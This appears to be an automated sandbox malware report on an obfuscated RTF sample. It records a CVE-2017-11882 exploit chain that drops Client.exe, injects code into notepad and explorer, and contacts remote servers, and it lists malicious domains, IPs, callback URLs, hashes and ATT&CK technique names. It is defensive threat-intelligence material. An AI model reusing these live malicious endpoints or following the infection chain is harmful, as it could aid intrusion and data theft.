          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts43
          Exploitation for Client Execution          		Boot or Logon Initialization Scripts812
          Process Injection          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory113
          System Information Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Command and Scripting Interpreter          		Logon Script (Windows)Logon Script (Windows)4
          Obfuscated Files or Information          		Security Account Manager221
          Security Software Discovery          		SMB/Windows Admin Shares1
          Clipboard Data          		Automated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)3
          Software Packing          		NTDS2
          Process Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets31
          Virtualization/Sandbox Evasion          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Rootkit          		Cached Domain Credentials1
          Remote System Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Masquerading          		DCSync1
          System Network Configuration Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job31
          Virtualization/Sandbox Evasion          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)812
          Process Injection          		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 680528 Sample: SecuriteInfo.com.Exploit.Rt... Startdate: 08/08/2022 Architecture: WINDOWS Score: 100 46 Snort IDS alert for network traffic 2->46 48 Document contains OLE streams which likely are hidden ActiveX objects 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 14 other signatures 2->52 11 EQNEDT32.EXE 47 2->11         started        14 WINWORD.EXE 292 21 2->14         started        process3 file4 74 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->74 17 cmd.exe 11->17         started        34 C:\Users\user\AppData\Local\Temp\Client.exe, PE32 14->34 dropped 36 C:\Users\user\...\Client.exe:Zone.Identifier, ASCII 14->36 dropped 38 ~WRF{4F98E955-E40B...E-253D7E3CD6E7}.tmp, Composite 14->38 dropped 76 Document exploit detected (creates forbidden files) 14->76 signatures5 process6 process7 19 Client.exe 17->19         started        signatures8 54 Multi AV Scanner detection for dropped file 19->54 56 Machine Learning detection for dropped file 19->56 58 Writes to foreign memory regions 19->58 60 3 other signatures 19->60 22 notepad.exe 19->22         started        process9 signatures10 62 Modifies the context of a thread in another process (thread injection) 22->62 64 Maps a DLL or memory area into another process 22->64 66 Sample uses process hollowing technique 22->66 68 2 other signatures 22->68 25 explorer.exe 22->25 injected process11 dnsIp12 40 www.best-boy.net 104.167.67.175, 49172, 80 ESITEDUS United States 25->40 42 thegoldencamel.online 66.235.200.170, 49171, 80 CLOUDFLARENETUS United States 25->42 44 www.thegoldencamel.online 25->44 70 System process connects to network (likely due to code injection or exploit) 25->70 72 Uses ipconfig to lookup or modify the Windows network settings 25->72 29 ipconfig.exe 25->29         started        signatures13 process14 signatures15 78 Modifies the context of a thread in another process (thread injection) 29->78 80 Maps a DLL or memory area into another process 29->80 82 Tries to detect virtualization through RDTSC time measurements 29->82 32 cmd.exe 29->32         started        process16

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf43%VirustotalBrowse
          SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf22%ReversingLabsDocument-RTF.Trojan.Heuristic

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp100%AviraEXP/CVE-2017-11882.Gen
          C:\Users\user\AppData\Local\Temp\Client.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\Client.exe24%ReversingLabsByteCode-MSIL.Spyware.Noon

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          9.0.notepad.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.2.notepad.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.notepad.exe.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.notepad.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.notepad.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.notepad.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.0.notepad.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          www.lundadonate.xyz/nb30/1%VirustotalBrowse
          www.lundadonate.xyz/nb30/100%Avira URL Cloudmalware
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://java.sun.com0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://www.best-boy.net/nb30/?4hntpZ=WWLsvV61WazOGjhWPmK2zCox7nD1HU3ZrNfLe9lvYYokad8918qHb5Jmu9JsRIh/3onKEQ==&PPa=ApcXW20%Avira URL Cloudsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe
          http://www.thegoldencamel.online/nb30/?4hntpZ=HrFg7Zw77Q4AgN6xWDdwD99B0qzSSsTIjhXIVaLmDYdCsLEuJk5C8qRmA5PaAiVsBqYing==&PPa=ApcXW20%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          thegoldencamel.online
          		66.235.200.170
          		truetrue
            		unknown
            www.best-boy.net
            		104.167.67.175
            		truetrue
              		unknown
              www.thegoldencamel.online
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                www.lundadonate.xyz/nb30/true
                • 1%, Virustotal, Browse
                • Avira URL Cloud: malware
                		low
                http://www.best-boy.net/nb30/?4hntpZ=WWLsvV61WazOGjhWPmK2zCox7nD1HU3ZrNfLe9lvYYokad8918qHb5Jmu9JsRIh/3onKEQ==&PPa=ApcXW2true
                • Avira URL Cloud: safe
                		unknown
                http://www.thegoldencamel.online/nb30/?4hntpZ=HrFg7Zw77Q4AgN6xWDdwD99B0qzSSsTIjhXIVaLmDYdCsLEuJk5C8qRmA5PaAiVsBqYing==&PPa=ApcXW2true
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.windows.com/pctv.explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                  		high
                  http://investor.msn.comexplorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                    		high
                    http://www.msnbc.com/news/ticker.txtexplorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                      		high
                      http://wellformedweb.org/CommentAPI/explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.piriform.com/ccleanerpexplorer.exe, 0000000A.00000000.969152262.0000000004385000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        http://www.iis.fhg.de/audioPAexplorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.piriform.com/ccleanerqexplorer.exe, 0000000A.00000000.1004860034.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.988141924.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.962364346.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030297831.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          http://www.piriform.com/ccleaner1SPS0explorer.exe, 0000000A.00000000.980217883.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012221961.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996182777.0000000008617000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.hotmail.com/oeexplorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                              		high
                              http://treyresearch.netexplorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                                		high
                                http://java.sun.comexplorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.icra.org/vocabulary/.explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 0000000A.00000000.957907821.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpfalse
                                  		high
                                  http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 0000000A.00000000.996446358.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1011537608.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.995286555.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996486805.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.980535513.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.980217883.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012512071.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012445260.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979280066.00000000084D2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    http://investor.msn.com/explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                                      		high
                                      http://www.piriform.com/ccleanerexplorer.exe, 0000000A.00000000.979092097.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.962364346.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030297831.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012512071.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012445260.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012221961.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979280066.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996182777.0000000008617000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        http://computername/printers/printername/.printerexplorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		low
                                        http://www.%s.comPAexplorer.exe, 0000000A.00000000.957907821.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		low
                                        http://www.autoitscript.com/autoit3explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://support.mozilla.orgexplorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.piriform.com/ccleanervexplorer.exe, 0000000A.00000000.969152262.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1007082449.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.991189675.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1032583619.0000000004385000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameClient.exe, 00000006.00000002.951081960.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://servername/isapibackend.dllexplorer.exe, 0000000A.00000000.973857047.0000000006450000.00000002.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		low

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                104.167.67.175
                                                		www.best-boy.netUnited States
                                                		22552ESITEDUStrue
                                                66.235.200.170
                                                		thegoldencamel.onlineUnited States
                                                		13335CLOUDFLARENETUStrue

                                                General Information

                                                Joe Sandbox Version:35.0.0 Citrine
                                                Analysis ID:680528
                                                Start date and time: 08/08/202218:37:102022-08-08 18:37:10 +02:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 9m 33s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.19912 (renamed file extension from 19912 to rtf)
                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                Number of analysed new started processes analysed:14
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.expl.evad.winRTF@11/9@2/2
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HDC Information:
                                                • Successful, ratio: 15% (good quality ratio 13.8%)
                                                • Quality average: 66.8%
                                                • Quality standard deviation: 30.4%
                                                HCA Information:
                                                • Successful, ratio: 76%
                                                • Number of executed functions: 86
                                                • Number of non-executed functions: 22
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                • Attach to Office via COM
                                                • Scroll down
                                                • Close Viewer

                                                Warnings

                                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                18:38:17API Interceptor28x Sleep call for process: EQNEDT32.EXE modified
                                                18:38:18API Interceptor179x Sleep call for process: Client.exe modified
                                                18:38:41API Interceptor5x Sleep call for process: notepad.exe modified
                                                18:39:25API Interceptor201x Sleep call for process: ipconfig.exe modified
                                                18:39:56API Interceptor1x Sleep call for process: explorer.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                No context

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                CLOUDFLARENETUShttps://u27327601.ct.sendgrid.net/ls/click?upn=fULIR8E9Fo6u8OA-2BYAXhc-2FQx1k1Uxf5mM3hKT1odxpi2fW8EBt9glJ9IlhAMtRmyu3L6y6BfP-2FvFe4WzL41-2F0ihBbNI0psOf9g5VAgP4xI-2BON0wZdo6Krvt87xgHH2wq7q76CjP4rwdTyjMymsvVQZCxTr-2BrMfMw6qKvghyIET4-3DgSx9_I7Qk3A2uQ8LXZnFWLHn8NGmOj0e12gLCrQBMxtq5mwqpFA5dVXp-2FLcxQ5jJWd1hqVirQrjX3-2BggEEBN-2F9-2Fq2RjKY3qLsVI0LzgBzNNSnqmzZmKETE9vO3g0Lj-2F7Bo76ctBoOfi0VrajAjVOhntr-2FB-2FnmqXdBpGoecANNPnI1XSxrBt7Q6tizRgFnTGciedfqX7q9qf6iwnx-2B2b2AQwki4B0xGxz8ey6JheNKDLofRVU-3DGet hashmaliciousBrowse
                                                • 104.17.25.14
                                                https://u27327601.ct.sendgrid.net/ls/click?upn=fULIR8E9Fo6u8OA-2BYAXhc-2FQx1k1Uxf5mM3hKT1odxpi2fW8EBt9glJ9IlhAMtRmyu3L6y6BfP-2FvFe4WzL41-2F0ihBbNI0psOf9g5VAgP4xI-2FNNksxCYlCfwKrRsBm3JOU7I14nxFnSIreiFHkQp0bvtrLsL8lLOEXDbk4owTsoKg-3DQPK8_GPSrddeDfhddW9pFoFhVDbWOQu7iyaT84Z3rGxxzDX5zOUziT4pGmdfe-2Fbl79QRgM6qGm9Wezxoa-2F8BOhz6c1Uz19NgxtmSoRv6IN4hUYbd8JAbUAn6Y4fQ61GK7skPRiNoRQBKwvmB7vfpH0rTi7qi0qS1KbkGRVoAj4SoncvCUjpsEtuan4xKXPAP0PvrjaAATpp8tEfuXHSQDO3DJwjUsR5GCgTPGIKzC3IgEwz4-3DGet hashmaliciousBrowse
                                                • 104.17.64.14
                                                https://u27327601.ct.sendgrid.net/ls/click?upn=fULIR8E9Fo6u8OA-2BYAXhc-2Ft-2BI-2BWdnapLwZaldGDfS7Hzp6-2BmLLXtY-2BKqdtluF3jEAa5yE5n-2FItM4tNQxCj05OhOADjByD9574J3m5d1GmPXSY7h82Aa2Akecy-2FdU1i4bqkz5IrM4nTV9tdx0tOLiFZuRvTG5FJGGZ1JkzvS-2FVEQ-3DsK_o_MDI6agRqhN5svOHRSDA7eZuKi4uFyPzTFD1vjcTk1IBg4i5bsEwnQokJNpSrAXVd-2BLJ0Tu5il1njeX-2BBg-2BTy35kp6sLlAo6uJKs05vFRp0l-2Fa7u2iEh5RdyWMH2MfSV3IL0Op4TPsHTYwsgJRgms5gC1ywl-2F62PAwUEmIe2Q0awgyUDBgTDdBoIfFprcaIJFffcOF1rQ-2BTK6f2pYeT8iDHz-2FBoH-2FN17ySL7ucYd0D4o-3DGet hashmaliciousBrowse
                                                • 104.18.11.207
                                                DOCUMENTO DE CONFIRMACION PSE.exeGet hashmaliciousBrowse
                                                • 162.159.134.233
                                                Unclear Proforma Invoice.vbsGet hashmaliciousBrowse
                                                • 104.21.39.116
                                                https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fu27327601.ct.sendgrid.net%2fls%2fclick%3fupn%3dfULIR8E9Fo6u8OA-2BYAXhc-2Ft-2BI-2BWdnapLwZaldGDfS7Hzp6-2BmLLXtY-2BKqdtluF3jEAa5yE5n-2FItM4tNQxCj05OhOADjByD9574J3m5d1GmPXSY7h82Aa2Akecy-2FdU1i4bbO12YuEY8ipo-2BRVeNDawl-2BwPDqskRhuHhOHG9c-2Fm7Gw-3DzFOe_vN750sXTiuVUpTx8JW5BwW0XbEMxWWlxA4ijxHmxf2b5I2UcuHOBN-2FV9KAoJzsJcEhTNV6ONW5GJcyujJV5KrmdsuJHHE6ucknYLD9S-2FFKjtdLWUSwvR-2BseXhYEF-2Bc74Wf4v1OC2TSbvAOKlYznighIhywBixOnslQeh4-2FDHHdw5u17J4on7oNl9jBIN40ALf4MxVNmsLgGDQBBRR-2F0nNg-2BxnlEKLBErYcmoCpIco0M-3D&c=E,1,L11H5-8bfxXAkL9fWLoe4mjKFfvO2utl2BzB8mgZ4JcbTEoYwuiSyFkeu8Bl4kCo43_RYlJ9IDinVwRRx_kL9d1tz2RYUzIkog0fJ4i_WBnJgVEqI29M&typo=1Get hashmaliciousBrowse
                                                • 104.18.11.207
                                                http://info.dnfcorp.com/unsubscribe/u/81/58adb727bfae91e4e5663f2a60e63649d32bc35a666c219d6a926e0ab5bfef85/1088736175Get hashmaliciousBrowse
                                                • 104.18.11.207
                                                https://u27327601.ct.sendgrid.net/ls/click?upn=fULIR8E9Fo6u8OA-2BYAXhc-2FQx1k1Uxf5mM3hKT1odxpi2fW8EBt9glJ9IlhAMtRmyu3L6y6BfP-2FvFe4WzL41-2F0ihBbNI0psOf9g5VAgP4xI-2BCFh6HEHI4o81Fh-2FVY8oBuVvbqhUVl98-2Fx8Ghn8qfT8WcwUpVuz4UgF5ymH-2BBXJU0-3DUCCo_YMJdYxCsbA3IVx986czIdfoAlJFC3wbeDJ3VEpZJ-2BRI9aloPf6W6lFzLERI9AfXKRTERIdI8AvT-2FOTPhMMJrfvrNUD7C6mKmFLSyHZ08ShAzsrzpp-2F-2BUG1v0abbl5IUi5dzO-2BcoBFm6J28mSDs7Jz-2FnWtkCDCj-2F6QjyUDnjdlyGEEMfoqgrWDjDvwDGG6ERHR18v8yTdiaaXkUCRm5jPTuwI2Ov7k3xb8lkYobqCfTc-3DGet hashmaliciousBrowse
                                                • 104.17.25.14
                                                http://info.dnfcorp.com/e/81/stonefly-private-cloud-storage/58rdcn/1088736175?h=jRwiY1bIrVps8EcmKqQ_hSGPvJ00ulzmrHVEaQrxL88Get hashmaliciousBrowse
                                                • 172.67.38.66
                                                ICPO07082299976.docGet hashmaliciousBrowse
                                                • 162.159.134.233
                                                http://okaloosaclerk.loyaltyhn.com/#.aHR0cDovL2Z1ZWd1aWxsb3MuY2wvd3AtaW5jbHVkZXMvaW1hZ2VzL3NtaWxpZXMvenovP2U9dHdpbGNveEBva2Fsb29zYWNsZXJrLmNvbQ==Get hashmaliciousBrowse
                                                • 104.18.10.207
                                                QBORemittance_Danellarealty#007-Intuit.htmlGet hashmaliciousBrowse
                                                • 104.17.24.14
                                                swift.exeGet hashmaliciousBrowse
                                                • 104.20.68.143
                                                Paystub_ACH_from_Seminolecountyfl_Association_Management_Inc._732456_0138.pdf.HtmlGet hashmaliciousBrowse
                                                • 104.17.25.14
                                                https://download-folder-files.secure-place.workers.dev/Get hashmaliciousBrowse
                                                • 104.17.25.14
                                                SARS DEMAND LETTER_Pdf.htmlGet hashmaliciousBrowse
                                                • 104.18.36.4
                                                https://www.paperturn-view.com/?pid=MjY263733Get hashmaliciousBrowse
                                                • 104.18.204.90
                                                SecuriteInfo.com.Exploit.CVE-2017-0199.02.Gen.27968.xlsxGet hashmaliciousBrowse
                                                • 188.114.96.3
                                                https://storageapi-fleek-co.translate.goog/a75bdd74-7db1-4f63-b832-e58250bda1b8-bucket/calamerywee/veweweesswe/none3.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp#IAmBadAtPhishing@GETAJOB.comGet hashmaliciousBrowse
                                                • 104.17.25.14
                                                https://dracoon.team/public/download-shares/y6NoiZr86Bd4qT3d2qF2howatSjGRn8WGet hashmaliciousBrowse
                                                • 104.18.36.4
                                                ESITEDUSt6bwEs3d5W.exeGet hashmaliciousBrowse
                                                • 104.167.67.167
                                                0vhbazZ0hg.dllGet hashmaliciousBrowse
                                                • 104.201.54.25
                                                2yQ8hmXyz0.dllGet hashmaliciousBrowse
                                                • 104.224.242.132
                                                fQew7F3WdJ.dllGet hashmaliciousBrowse
                                                • 104.222.239.165
                                                cutie.i686Get hashmaliciousBrowse
                                                • 172.80.124.140
                                                OE6aq7Pen7.exeGet hashmaliciousBrowse
                                                • 172.81.61.204
                                                8yE2Cb5pMj.exeGet hashmaliciousBrowse
                                                • 172.81.62.200
                                                ADNOC RFQ 97571784.exeGet hashmaliciousBrowse
                                                • 104.221.130.199
                                                jew.arm7Get hashmaliciousBrowse
                                                • 104.201.37.126
                                                payment advice_0009890.exeGet hashmaliciousBrowse
                                                • 172.80.98.79
                                                arm7Get hashmaliciousBrowse
                                                • 69.87.201.72
                                                New Order 56723SCF..exeGet hashmaliciousBrowse
                                                • 104.201.51.51
                                                miori.arm7-20220630-2250Get hashmaliciousBrowse
                                                • 104.232.145.187
                                                nHgrTEc1Q0tZEa7.exeGet hashmaliciousBrowse
                                                • 172.80.98.79
                                                ADNOC RFQ 97571784_pdf.exeGet hashmaliciousBrowse
                                                • 172.80.98.79
                                                DHL_Shipping Documents_pdf_98567.exeGet hashmaliciousBrowse
                                                • 172.80.98.79
                                                sora.arm7Get hashmaliciousBrowse
                                                • 69.87.201.51
                                                DHL_Shipping Documents_pdf.exeGet hashmaliciousBrowse
                                                • 172.80.98.79
                                                payment advice_pdf_049584.exeGet hashmaliciousBrowse
                                                • 104.221.130.199
                                                HPYYRvmbqFGet hashmaliciousBrowse
                                                • 172.82.127.215

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):968192
                                                Entropy (8bit):7.221905189702602
                                                Encrypted:false
                                                SSDEEP:12288:924dTkV9VXtdGI1HNDT5wQjG6EXPGc/16/PxuepSxmwCD8ik:Ts9RauHN/5wa8/L9UueAxmfHk
                                                MD5:BE1CF0179CC129FE5BA102A5EFFA515E
                                                SHA1:4A0468FAB21F7C2054F728530E9502C294B92356
                                                SHA-256:64249AF03BFA82B6DA362EAF94864CF4698BECD35869586F43101E62D1B706AF
                                                SHA-512:FF189C9764C3AF8AA4F33F268F0B50FBFA6E4A938F1F8059BFDF60D1409029CBDEBC1D926E4AEF1BA5F616B87BB5D62FD07A175481BD9F87BB6BF58E27394FA8
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: rtf_cve2017_11882_ole, Description: Attempts to identify the exploit CVE 2017 11882, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp, Author: John Davison
                                                • Rule: EXP_potential_CVE_2017_11882, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp, Author: ReversingLabs
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Reputation:low
